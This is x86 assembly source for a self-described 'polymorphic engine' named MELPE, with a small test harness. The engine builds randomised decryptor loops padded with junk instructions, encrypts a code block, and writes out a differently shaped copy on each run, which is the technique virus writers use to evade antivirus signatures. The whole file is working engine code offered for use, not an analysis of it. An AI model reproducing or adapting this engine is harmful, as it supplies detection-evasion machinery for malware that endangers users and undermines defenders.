; MELPE - Malfunction's Extremely Lame Polymorphic Engine

.586p
.model flat

        extrn ExitProcess:proc
        extrn MessageBoxA:proc
        extrn VirtualAlloc:proc
        extrn VirtualFree:proc

.data

poly_data_begin:

        rdtsc   equ  DW 310fh

        useEAX = 000b
        useEBX = 011b
        useECX = 001b
        useEDX = 010b
        useESI = 110b
        useEDI = 111b
        useEBP = 101b

        __eax = 00000001b
        __edx = 00001000b
        __esi = 00010000b
        __edi = 00100000b

one_byte:
        cld
        stc
        clc
        cmc
        inc eax
        dec eax
        push eax
        pop eax

        inc eax
crypt_instr1: nop
        dec eax

two_byte:
        ; 0c0h as second instr byte for eax,eax operands

        DB 8bh  ; mov reg,reg
        DB 03h  ; add reg,reg
        DB 23h  ; and reg,reg
        DB 2bh  ; sub reg,reg
        DB 0bh  ;  or reg,reg
        DB 33h  ; xor reg,reg
        DB 0F7h ; not reg
        DB 0F7h ; neg reg

five_byte:
        DB 0b8h ; mov reg,imm32
        DB 2dh  ; sub reg,imm32
crypt_instr5:
        DB 35h  ; xor reg,imm32
        DB 05h  ; add reg,imm32
        DB 25h  ; and reg,imm32
        DB 0dh  ;  or reg,imm32

__regs:
        _eax DB useEAX
        _ebx DB useEBX
        _ecx DB useECX
        _edx DB useEDX
        _esi DB useESI
        _edi DB useEDI
        _ebp DB useEBP

        rnd_seed DD ?
        used_regs DD ?

        push_it DB ?
        load_method DB ?
        dec_reg1 DB ?
        dec_reg2 DB ?
        cnt_reg DB ?

        store_decr_addr DD ?
        decode_addr DD ?
        jump_addy DD 0
        start_dec DD ?
        
        code_size = (dc_e-dc_s+3)/4

        encode_struc struc
                instr_size DB ?
                instr_type DB ?
                opt_imm32  DD ?
        encode_struc ends

        encode_script encode_struc 15 dup (<0,0,0>)

        dec_instr_cnt DD ?
        Pdec_instr DD ?

poly_data_end:

        store_addy DD ?
        msg_title DB "dummy",0
        msg_message DB "poly engine testing dummy 0.9b",0
        average DD 0

dc_s:
        call delta
delta:
        pop eax
        sub eax,store_addy
        sub eax,5
        add average,eax
        ret
dc_e:

.code
prog_start:
        mov eax,(poly_data_end-poly_data_begin)+(end_poly-start_poly)

        push 40h
        push 1000h
        push 2000h
        push 0
        call VirtualAlloc
        mov store_addy,eax
        mov decode_addr,eax

        mov ecx,2000
test_loop:
        push ecx

        xor ebp,ebp
        mov edi,store_addy
        mov ecx,code_size
        lea esi,dc_s
        call start_poly
        call dword ptr [store_addy]

        pop ecx
        loop test_loop

        mov eax,average
        xor edx,edx
        mov ecx,2000
        div ecx

code_start:
        push 10h
        push offset msg_title
        push offset msg_message
        push 0
        call MessageBoxA

        push 0
        call ExitProcess
code_end:


; poly engine will expect:
; EDI = where to put decryptor + enc code
; ESI = code to encrypt
; ECX = size of code

start_poly:
        rdtsc
        mov [ebp+rnd_seed],eax
        mov dword ptr [ebp+used_regs],0
        mov [ebp+start_dec],edi

        pushad
        mov ecx,(size encode_struc)*15
        lea edi,[ebp+encode_script]
        xor eax,eax
        rep stosb
        popad

        call do_junk

        push 2
        call random
        test eax,eax
        setz byte ptr [ebp+load_method]
        jz dword_loader2

        or dword ptr [ebp+used_regs],__esi or __eax or __edi
        call set_count_reg
        mov byte ptr [ebp+dec_reg2],0

        call do_junk
        mov al,0beh  ; mov esi,imm32
        stosb
        mov [ebp+store_decr_addr],edi
        add edi,4
        call do_junk
        mov ax,0fe8bh   ; mov edi,esi
        stosw
        mov [ebp+jump_addy],edi
        call do_junk
        mov al,0adh   ; lodsd
        stosb
        call go_crypting
        call do_junk
        mov al,0abh
        stosb
        call do_junk
        jmp in_common

dword_loader2:
        call set_count_reg

        call gimme_unused_reg
        mov [ebp+dec_reg1],dl
        bts dword ptr [ebp+used_regs],eax
        mov al,0b8h ; mov eax,imm32
        or al,dl
        stosb
        mov [ebp+store_decr_addr],edi
        add edi,4
        call do_junk

        mov [ebp+jump_addy],edi
        call gimme_unused_reg
        mov [ebp+dec_reg2],dl
        bts dword ptr [ebp+used_regs],eax
        mov al,08bh
        stosb
        movzx eax,byte ptr [ebp+dec_reg2]
        shl eax,3
        or al,[ebp+dec_reg1]
        stosb
        call check_ebp
        call go_crypting
        call do_junk
        mov al,89h
        stosb
        movzx eax,byte ptr [ebp+dec_reg2]
        shl eax,3
        or al,[ebp+dec_reg1]
        stosb
        call check_ebp
        call do_junk
        mov al,83h
        stosb
        mov al,0c0h
        or al,[ebp+dec_reg1]
        stosb
        mov al,4
        stosb
        call do_junk

in_common:
        mov al,48h
        or al,[ebp+cnt_reg]
        stosb
        mov ax,850fh
        stosw
        mov eax,[ebp+jump_addy]
        sub eax,edi
        sub eax,4
        stosd

        mov eax,edi
        sub eax,[ebp+start_dec]
        add eax,[ebp+decode_addr]
        push edi
        mov edi,[ebp+store_decr_addr]
        stosd
        pop edi

        mov ecx,code_size
do_crypt1:
        push ecx
        mov edx,[ebp+Pdec_instr]
        mov ecx,[ebp+dec_instr_cnt]
        lodsd

do_crypt2:
        sub edx,size encode_struc

        mov bh,[edx.instr_size]
        mov bl,[edx.instr_type]
        cmp bh,5
        jae _crypt1byte
        cmp bh,3
        jae _crypt2byte

        cmp bl,0
        jnz sub_add
        xor eax,[edx.opt_imm32]
        jmp next_action
sub_add:
        jns perform_add
        sub eax,[edx.opt_imm32]
        jmp next_action
perform_add:
        add eax,[edx.opt_imm32]
        jmp next_action

_crypt1byte:
        cmp bl,1
        jnz perform_inc
        dec eax
        jmp next_action
perform_inc:
        inc eax
        jmp next_action

_crypt2byte:
        cmp bl,1
        jz perform_not
        neg eax
        jmp next_action
perform_not:
        not eax

next_action:
        dec ecx
        jnz do_crypt2
        stosd
        pop ecx
        dec ecx
        jnz do_crypt1
        ret

check_ebp:
        cmp byte ptr [ebp+dec_reg1],useEBP
        jnz not_ebp
        or byte ptr [edi-1],40h
        xor eax,eax
        stosb
not_ebp:
        ret

go_crypting:      
        push 10
        call random
        lea ecx,[eax+5]
        lea edx,[ebp+encode_script]

        push ecx

crypt_code:
        push ecx
        push edx
        call do_junk
        pop edx
        pop ecx

        push 7
        call random
        mov byte ptr [edx.instr_size],al
        cmp al,5
        jae crypt1byte
        cmp al,3
        jae crypt2byte

        push 3
        call random
        dec eax
        mov bl,byte ptr [ebp+crypt_instr5+eax]
        neg eax
        mov [edx.instr_type],al

        cmp byte ptr [ebp+dec_reg2],0
        jz its_eax2

        mov al,81h
        stosb
        add bl,0bbh

its_eax2:
        mov al,bl
        or al,[ebp+dec_reg2]
        stosb

        push -1
        call random
        stosd
        mov [edx.opt_imm32],eax

        jmp next_crypt

crypt1byte:
        push 2
        call random
        dec eax
        test eax,eax
        jnz no_incxxx
        inc eax

no_incxxx:
        mov bl,al
        neg eax
        mov al,byte ptr [ebp+crypt_instr1+eax]
        or al,[ebp+dec_reg2]
        stosb
        mov byte ptr [edx.instr_type],bl

        jmp next_crypt


crypt2byte:
        push 2
        call random
        mov byte ptr [edi],0f7h
        inc edi
        mov bl,0d0h
        test eax,eax
        setz byte ptr [edx.instr_type]
        jz do_not
        add bl,8
do_not:
        or bl,[ebp+dec_reg2]
        mov byte ptr [edi],bl
        inc edi

next_crypt:
        add edx,size encode_struc
        dec ecx
        jnz crypt_code

        pop dword ptr [ebp+dec_instr_cnt]
        mov [ebp+Pdec_instr],edx
        ret

random:
        mov eax,[ebp+rnd_seed]
        add eax,0b53fc427h
        rol eax,14
        xor eax,0c629ca5ah
        mov [ebp+rnd_seed],eax

        push edx
        push ebx

        mov ebx,[esp+12]
        xor edx,edx
        div ebx
        xchg eax,edx

        pop ebx
        pop edx
        ret 4

gimme_unused_reg:
        push 7
        call random

        bt dword ptr [ebp+used_regs],eax
        jc gimme_unused_reg

        movzx edx,byte ptr [ebp+__regs+eax]
        ret

do_junk:
        mov byte ptr [ebp+push_it],0

        push 5
        call random
        add eax,5
        mov ecx,eax
gen_junk:
        push ecx
        push 9
        call random
        cmp al,6
        jae _5byte
        cmp al,3
        jae _2byte
        cmp al,1
        jae _shift

cr_1b:
        push 3
        call random
        test eax,eax
        jnz add_reg

        push 4
        call random
        mov al,byte ptr [ebp+one_byte+eax]
        stosb
        jmp end_1b

add_reg:
        push 4
        call random
        add eax,4
        mov bl,byte ptr [ebp+one_byte+eax]

        push eax
        call gimme_unused_reg
        or dl,bl
        pop eax
        cmp al,6
        mov al,dl
        ja use_pop
        jz use_push
        stosb
        jmp end_1b

use_pop:
        cmp byte ptr [ebp+push_it],0
        jz cr_1b
        stosb
        dec byte ptr [ebp+push_it]
        jmp end_1b        
       
use_push:
        stosb
        inc byte ptr [ebp+push_it]

end_1b:
        jmp next_junk

_2byte:
        push 8
        call random
        mov ebx,eax
        mov al,byte ptr [ebp+two_byte+eax]
        stosb
        cmp bl,6
        jae do_notneg
        call gimme_unused_reg
        shl dl,3
        push 7
        call random
        mov al,byte ptr [ebp+__regs+eax]
        or al,0c0h
        or al,dl
        stosb
        jmp next_junk

do_notneg:
        mov bl,0d0h
        call add8_or_not
        jmp next_junk

_5byte:
        push 6
        call random
        mov bl,byte ptr [ebp+five_byte+eax]

        call gimme_unused_reg

        cmp bl,0b8h
        jz its_eax
        test edx,edx
        jz its_eax

        mov al,81h
        stosb
        add bl,0bbh

its_eax:
        mov al,dl
        or al,bl
        stosb

        push -1
        call random
        stosd
        jmp next_junk

_shift:
        mov al,0d3h
        stosb
        push 3
        call random
        imul eax,eax,10h
        lea ebx,[eax+0C0h]
        push 2
        call random
        test eax,eax
        call add8_or_not
        push 2
        call random
        test eax,eax
        jnz next_junk
        sub byte ptr [edi-2],12h
        push 100h
        call random
        stosb

next_junk:
        pop ecx
        dec ecx
        jnz gen_junk

correct_stack:
        movzx ecx,byte ptr [ebp+push_it]
        test ecx,ecx
        jz quit_do_junk
cr_stack_lp:
        call gimme_unused_reg
        or dl,58h ; pop eax
        mov al,dl
        stosb
        loop cr_stack_lp
quit_do_junk:
        ret

add8_or_not:
        je no_plus8
do_shift:
        add bl,8
no_plus8:      
        call gimme_unused_reg
        mov al,bl
        or al,dl
        stosb
        ret


set_count_reg:
        call gimme_unused_reg
        bts dword ptr [ebp+used_regs],eax
        mov [ebp+cnt_reg],dl

        mov al,0b8h
        or al,dl
        stosb
        mov eax,code_size
        stosd

        call do_junk
        ret        

end_poly:

end prog_start
